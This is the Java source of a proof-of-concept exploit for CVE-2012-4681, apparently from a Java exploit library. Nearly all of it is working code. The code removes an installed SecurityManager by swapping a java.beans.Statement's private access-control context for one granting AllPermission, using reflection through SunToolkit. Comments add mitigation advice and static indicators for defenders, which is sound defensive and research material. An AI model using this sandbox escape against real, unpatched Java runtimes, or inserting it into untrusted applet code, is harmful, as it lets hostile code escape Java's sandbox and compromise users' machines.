Package cve20124681

Source Code of cve20124681.CVE_2012_4681a

/**
* Copyright (c) 2013-2014
*
* All rights reserved.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
* The Java-Exploit-Library is licensed under the Creative Commons
* Attribution-ShareAlike 4.0 International License.
*
* Please see the provided LICENSE.txt for a full copy of the agreement.
*/

package cve20124681;

import java.awt.Toolkit;
import java.beans.Expression;
import java.beans.Statement;
import java.lang.reflect.Field;
import java.net.MalformedURLException;
import java.net.URL;
import java.security.AccessControlContext;
import java.security.AllPermission;
import java.security.CodeSource;
import java.security.Permissions;
import java.security.ProtectionDomain;
import java.security.cert.Certificate;

/**
 * Proof-of-concept for CVE-2012-4681: code running under a SecurityManager
 * removes that SecurityManager.
 *
 * This is the same as CVE_2012_4681, except that we use a simpler way to get
 * a handle to SunToolkit.
 *
 * What the code visibly does:
 * 1. main() installs a default SecurityManager and prints it.
 * 2. disableSecurity() builds a java.beans.Statement that calls
 *    System.setSecurityManager(null).
 * 3. The Statement's private "acc" field is overwritten with an
 *    AccessControlContext whose only ProtectionDomain holds AllPermission.
 * 4. The Field handle for "acc" is obtained by reflectively invoking a method
 *    named "getField" on the class returned by loadSunToolkit().
 * 5. The Statement is executed and main() prints the SecurityManager again;
 *    a null value on the second line means the bypass worked on this runtime.
 *
 * Notes for defenders:
 * - Mitigation: run a Java runtime that carries the fix for CVE-2012-4681 (see
 *   Oracle's security alert for that CVE for the affected and fixed releases)
 *   and do not let untrusted applet / Web Start code run on unpatched runtimes.
 * - The SecurityManager sandbox is not a robust isolation boundary; it has been
 *   deprecated for removal since Java 17 (JEP 411). Isolate untrusted code at
 *   the process or OS level instead.
 * - Static indicators in untrusted class files: java.beans.Statement or
 *   java.beans.Expression used together with the string constants
 *   "setSecurityManager", "getField" and "acc", plus construction of a
 *   ProtectionDomain containing AllPermission.
 */
public class CVE_2012_4681a {

  // Not referenced anywhere in this class.
  public final static Object o = null;

  /**
   * Demonstrates the issue: installs a SecurityManager, prints it, runs the
   * bypass, then prints the SecurityManager again.
   *
   * @param args unused
   * @throws Throwable anything raised by the reflective calls made below
   */
  public static void main(String[] args) throws Throwable {
    System.setSecurityManager(new SecurityManager());
    System.out.println("SecurityManager: " + System.getSecurityManager());

    disableSecurity();
    // Prints "null" here if the SecurityManager was removed.
    System.out.println("SecurityManager: " + System.getSecurityManager());
  }

  /**
   * Builds and executes a Statement equivalent to
   * System.setSecurityManager(null), after swapping the Statement's stored
   * access-control context for a fully privileged one.
   *
   * @throws Throwable anything raised while patching or executing the Statement
   */
  private static void disableSecurity() throws Throwable {
    // new Object[1] is a one-element array holding null, i.e. the argument list (null).
    Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
    overrideStatementAccessControlContext(localStatement);
    localStatement.execute();
  }

  /**
   * Overwrites the private "acc" field of the given Statement with the
   * context built by createDummyAccessControlContext().
   *
   * @param statement the Statement whose "acc" field is replaced
   * @throws Throwable anything raised while obtaining or writing the field
   */
  private static void overrideStatementAccessControlContext(Statement statement) throws Throwable {
    AccessControlContext acc = createDummyAccessControlContext();
    Field privateField = getPrivateField(Statement.class, "acc");
    // No setAccessible(true) is called here, so this write relies on the Field
    // returned by getPrivateField() already being accessible; otherwise set()
    // on a private field of another class fails with IllegalAccessException.
    privateField.set(statement, acc);
  }

  /**
   * Creates an AccessControlContext consisting of a single ProtectionDomain
   * that is granted AllPermission.
   *
   * @return the new context
   * @throws MalformedURLException declared because of the URL constructor
   */
  private static AccessControlContext createDummyAccessControlContext() throws MalformedURLException {
    Permissions permissions = new Permissions();
    permissions.add(new AllPermission());
    // Code source is the URL "file:///" with an empty certificate array.
    ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), permissions);
    return new AccessControlContext(new ProtectionDomain[] { protectionDomain });
  }

  /**
   * Obtains a Field by using java.beans.Expression to invoke a method named
   * "getField" on the class returned by loadSunToolkit(), passing the class
   * and field name as arguments.
   *
   * NOTE(review): the target is a Class object, so java.beans should resolve
   * "getField" as a static method of that class; per the class comment that
   * class is expected to be SunToolkit. Its behaviour is not visible in this
   * file; confirm against the JDK source of the runtime under test.
   *
   * @param clazz class that declares the field
   * @param fieldName name of the field to look up
   * @return the Field produced by the reflective call
   * @throws Throwable anything raised by the Expression, or a ClassCastException
   *         if the result is not a Field
   */
  private static Field getPrivateField(Class<?> clazz, String fieldName) throws Throwable {
    Expression localExpression = new Expression(loadSunToolkit(), "getField", new Object[] { clazz, fieldName });
    localExpression.execute();
    return (Field) localExpression.getValue();
  }

  /**
   * Returns the superclass of the superclass of the default AWT Toolkit's
   * runtime class.
   *
   * Alternative way to get a handle to SunToolkit, at least on OSX (per the
   * original author). NOTE(review): this assumes the platform toolkit sits
   * exactly two levels below SunToolkit; on other platforms the hierarchy may
   * differ and a different class (or null) is returned.
   *
   * @return the class two levels above the default toolkit's class
   * @throws Throwable declared by the signature; also propagates any error
   *         from Toolkit.getDefaultToolkit()
   */
  private static Class<?> loadSunToolkit() throws Throwable {
    Toolkit defaultToolkit = Toolkit.getDefaultToolkit();
    Class<?> c2 = defaultToolkit.getClass().getSuperclass().getSuperclass();
    return c2;
  }
}